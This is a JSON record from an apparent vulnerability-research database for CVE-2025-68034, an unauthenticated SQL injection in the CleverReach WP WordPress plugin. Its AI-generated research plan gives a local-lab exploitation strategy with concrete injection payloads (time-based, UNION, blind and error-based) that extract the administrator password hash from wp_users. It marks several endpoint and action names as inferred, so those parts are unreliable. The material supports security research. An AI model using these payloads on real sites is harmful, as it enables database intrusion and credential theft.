[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqS7GzCVzPfB3V33whUi5kuzPy4MHXzT4bnKcntWgUpc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2025-68034","cleverreach-wp-unauthenticated-sql-injection","CleverReach® WP \u003C= 1.5.21 - Unauthenticated SQL Injection","The CleverReach® WP plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.5.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cleverreach-wp",null,"\u003C=1.5.21","1.5.22","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-15 00:00:00","2026-01-30 20:39:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F17ee6e87-2534-4397-833e-e0a1cd5d947c?source=api-prod",16,[],"researched",false,3,"This research plan focuses on identifying and exploiting the unauthenticated SQL injection vulnerability in the CleverReach® WP plugin (CVE-2025-68034).\n\n### 1. Vulnerability Summary\nThe CleverReach® WP plugin (\u003C= 1.5.21) fails to properly sanitize and prepare a user-supplied parameter before using it in a database query. Specifically, an unauthenticated AJAX handler likely concatenates a request parameter (e.g., `form_id`, `id`, or a `hash`) directly into a SQL statement. This allows an attacker to manipulate the query logic, leading to the extraction of sensitive data from the WordPress database, such as administrator password hashes and secret keys.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** The plugin registers `wp_ajax_nopriv_` hooks. Based on the plugin's purpose (forms and subscriptions), the likely actions are:\n    *   `cleverreach_ajax_get_form` (inferred)\n    *   `cleverreach_subscribe` (inferred)\n*   **Vulnerable Parameter:** A parameter such as `form_id`, `crwp_id`, or `id`.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A CleverReach form may need to be published or a specific shortcode must exist on a page to trigger the script localization that contains the necessary nonce (if enforced).\n\n### 3. Code Flow (Trace)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` parameter.\n2.  **Hook Registration:** The plugin registers a handler in its main class or an AJAX handler class:\n    `add_action( 'wp_ajax_nopriv_cleverreach_ajax_get_form', array( $this, 'get_form_callback' ) );` (inferred).\n3.  **Parameter Extraction:** Inside the callback (e.g., `get_form_callback`), the code retrieves input:\n    `$form_id = $_POST['form_id'];`\n4.  **Database Sink:** The `$form_id` is passed into a query method without `$wpdb->prepare()`:\n    `$wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}cleverreach_forms WHERE form_id = \" . $form_id );` (inferred).\n5.  **Execution:** The SQL injection occurs as the attacker appends `UNION SELECT` or boolean logic to the `$form_id`.\n\n### 4. Nonce Acquisition Strategy\nIf the `nopriv` AJAX handler enforces a nonce check (which is common for WP plugins even if they are vulnerable to SQLi), follow these steps:\n\n1.  **Locate Script Localization:** The plugin likely uses `wp_localize_script` to pass a nonce to its frontend JS.\n2.  **Identify Shortcode:** Search the source for `add_shortcode`. Likely: `[cleverreach]`.\n3.  **Setup Page:**\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"CR Test\" --post_content='[cleverreach]'` (Note: You may need a valid form ID in the shortcode, e.g., `[cleverreach id=\"1\"]`).\n4.  **Extract Nonce:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to find the localization object. Look for strings like `cleverreach_vars` or `crwp_ajax`.\n    *   **JS Identifier:** `window.cleverreach_vars?.nonce` or `window.cr_ajax_object?.security` (inferred).\n\n### 5. Exploitation Strategy\n\n#### Step 1: Confirm Injection (Time-based)\nWe will first use a time-based sleep to confirm the vulnerability without needing to know the table structure.\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=cleverreach_ajax_get_form&form_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n#### Step 2: UNION-Based Data Extraction\nOnce confirmed, we attempt to extract the admin password hash.\n1.  **Find Column Count:** Iterate `ORDER BY X` until an error or change in response occurs.\n2.  **Payload:**\n    ```\n    action=cleverreach_ajax_get_form&form_id=-1 UNION SELECT 1,2,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -\n    ```\n    *(Adjust column count based on results from Step 1).*\n\n### 6. Test Data Setup\n*   **Plugin Installation:** Ensure `cleverreach-wp` version 1.5.21 is installed.\n*   **Database Entry:** Since the query likely targets a plugin-specific table, ensure at least one form exists so the original query doesn't return empty before the injection:\n    `wp db query \"INSERT INTO wp_cleverreach_forms (form_id, name) VALUES (1, 'Test Form');\"` (table name inferred).\n*   **Published Page:** Create a page with the shortcode as described in Section 4.\n\n### 7. Expected Results\n*   **Time-based:** The server response should be delayed by exactly 5 seconds.\n*   **UNION-based:** The response body (JSON or HTML) will contain a string starting with `$P$` or `$wp$2y$` (the WordPress password hash for the administrator).\n\n### 8. Verification Steps\nAfter the exploit, verify the data using WP-CLI:\n1.  `wp user get 1 --field=user_pass`\n2.  Compare the hash returned by the HTTP request with the hash retrieved via WP-CLI. If they match, the SQL injection is confirmed.\n\n### 9. Alternative Approaches\n*   **Boolean-Based Blind:** If the plugin returns different results for \"Form Found\" vs \"Form Not Found\" but suppresses SQL errors, use:\n    `form_id=1 AND (SELECT ASCII(SUBSTRING(user_pass,1,1)) FROM wp_users WHERE ID=1)>64`\n*   **Error-Based:** If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` to force the hash into an error message:\n    `form_id=1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)`\n*   **Different Actions:** If `cleverreach_ajax_get_form` is not the sink, grep the plugin for `wp_ajax_nopriv` and check the callbacks for any usage of `$wpdb->query` or `$wpdb->get_results`.","gemini-3-flash-preview","2026-05-05 09:03:42","2026-05-05 09:05:23",{"type":30,"vulnerable_version":31,"fixed_version":11,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":34,"fixed_zip":35,"all_tags":36},"plugin","1.5.21","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags\u002F1.5.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcleverreach-wp.1.5.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags\u002F1.5.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcleverreach-wp.1.5.22.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcleverreach-wp\u002Ftags"]